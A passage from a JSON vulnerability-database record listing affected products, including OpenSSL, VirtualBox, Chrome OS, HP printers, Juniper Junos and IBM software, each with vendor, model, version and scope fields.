"vendor": "hp", "version": "473012.6" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.6" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "ssl vpn 8.0r4.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.4" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.5" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0" }, { "model": "spa525 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap smi-s agent", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "cp1543-1", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "1.1.25" }, { "model": "laserjet m9050 multifunction printer cc395a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "51.256.1" }, { "model": "ive os 7.4r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.41" }, { "model": "laserjet enterprise color m551 series cf081a 2302963 436083", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "500" }, { "model": "advanced settings utility", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.52" }, { "model": "msr30 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.0" }, { "model": "color laserjet enterprise m750 d3l10a 2302963 436077", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "color laserjet cp3505 printer series cb443a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.160.2" }, { "model": "laserjet enterprise m601 series ce990a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6000" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "proxysg sgos", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "6.2.15.6" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.54" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087330" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.30" }, { "model": "utm", "scope": "ne", "trust": 0.3, "vendor": "sophos", "version": "9.113" }, { "model": "espace u2980 v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.9" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "color laserjet printer series q7536a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "300046.80.2" }, { "model": "clearpass", "scope": "eq", "trust": 0.3, "vendor": "arubanetworks", "version": "6.2.0" }, { "model": "identity service engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jsa 2014.2r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.2" }, { "model": "9.2-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.177" }, { "model": "s12700 v200r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.35" }, { "model": "8.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "oceanstor s2200t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.1" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x571431.43" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0" }, { "model": "hsr6602 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.18" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.1" }, { "model": "laserjet enterprise color m775 series cc524a 2302963 436079", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "700" }, { "model": "s7-1500", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.23" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v39.7" }, { "model": "s2900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "open source security information management", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "4.10" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "9.6" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.21" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.32" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.6" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "datafort common criteria fc-series", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "junos 11.4r7-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.20" }, { "model": "pulse desktop", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.38" }, { "model": "usg5000 v300r001c10spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.7" }, { "model": "ovf tool", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.5.1" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.9" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "message networking sp4", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.1" }, { "model": "stunnel", "scope": "eq", "trust": 0.3, "vendor": "stunnel", "version": "5.00" }, { "model": "chargeback manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.5" }, { "model": "web security gateway", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.7.3" }, { "model": "laserjet enterprise flow m830z mfp cf367a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "officejet enterprise color mfp b5l07a 2302963 436066", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "x585" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7500" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "junos 12.1x45-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "laserjet m4345 multifunction printer cb428a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.8" }, { "model": "junos 13.2r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0.4" }, { "model": "fortimail build", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.1.3281" }, { "model": "color laserjet enterprise m750 d3l08a 2302963 436077", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "s5900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esight v2r3c10spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "laserjet pro m401a/d/dn/dnw/dw/n cf278a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "40020150212" }, { "model": "ssl vpn", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.4" }, { "model": "web security gateway", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.8.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.40" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.4" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.78" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.65" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.95" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.5" }, { "model": "vma", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.11" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.31" }, { "model": "s3900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.8" }, { "model": "proxysgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1.6.3" }, { "model": "proxyav", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "3.5.21" }, { "model": "anyoffice emm", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "2.6.0601.0090" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.13" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.39" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "0.8" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.12" }, { "model": "color laserjet enterprise m750 d3l09a 2302963 436077", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "web security", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.8.3" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.33" }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-476" }, { "model": "system x3400m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "73781.42" }, { "model": "strm/jsa 2013.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx7412", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.171" }, { "model": "vcenter support assistant", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "laserjet p4015 cb511a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr50-g2 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.21" }, { "model": "exalogic", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x4-22.0.6.2.0" }, { "model": "system x3550m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79461.42" }, { "model": "usg9500 usg9500 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.156" }, { "model": "laserjet cm3530 multifunction printer cc520a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "53.236.1" }, { "model": "s2750\u0026s5700\u0026s6700 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "4.3.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.58" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "11.16" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0" }, { "model": "jetdirect 690n eio card j8007a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "41.16" }, { "model": "ive os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.4" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "flex system p24l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "ovf tool", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.17" }, { "model": "command view server based management", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "10.3.3" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clearpass", "scope": "eq", "trust": 0.3, "vendor": "arubanetworks", "version": "6.2.6" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.18" }, { "model": "oic v100r001c00spc402", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "documentum content server", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.0" }, { "model": "vdi-in-a-box", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.14" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.30" }, { "model": "algo one", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7.1" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "s7700\u0026s9700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "7.3.1" }, { "model": "9.2-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "color laserjet cm6030 multifunction printer ce665a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "vma san gateway g5.5.1.1", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "dsr-1000 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "laserjet enterprise m603 series ce996a 2302963 436082", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "600" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "tivoli storage flashcopy manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "1.0.4" }, { "model": "vtm v100r001c30", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos space 13.3r4.4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "2.4.4" }, { "model": "oceanstor s5500t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.1.1" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571481.43" }, { "model": "fortivoiceos", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1" }, { "model": "imc uam", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.00" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.8" }, { "model": "integrated management module ii", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.86" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.24" }, { "model": "system x3650m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79491.42" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.213" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "espace u2980 v100r001 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "intelligent management center", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "laserjet enterprise m602 series ce993a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6000" }, { "model": "tivoli netcool/system service monitor fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "watson explorer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.02" }, { "model": "vsphere cli", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "junos 10.4r13", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "laserjet enterprise p3015 ce528a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.71" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.54" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "fusion", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "8.4-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "22.5" }, { "model": "one-x communicator for mac os", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "x2.0.10" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.2" }, { "model": "spa500 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos os 13.1r4-s2", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "color laserjet enterprise m750 d3l08a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "firepass", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "system x3250m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "42521.42" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.2" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.112" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.2" }, { "model": "junos d35", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.0.1880" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.1.15" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.32" }, { "model": "ape", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "2.0.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.43" }, { "model": "laserjet m4345 multifunction printer cb426a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "8.4-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "telepresence ip vcr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "msr20-1x russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "si switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55000" }, { "model": "aura application server sip core pb26", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "0.9.99" }, { "model": "documentum content server sp1 p26", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.3" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0" }, { "model": "bladesystem c-class virtual connect", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.10" }, { "model": "9.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.0" }, { "model": "junos 12.1x44-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli netcool/system service monitor fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.28" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "junos 12.1x45-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.178" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "eupp v100r001c01spc101", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.5" }, { "model": "flex system p460 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-42x)0" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "2.2.7" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.76" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" 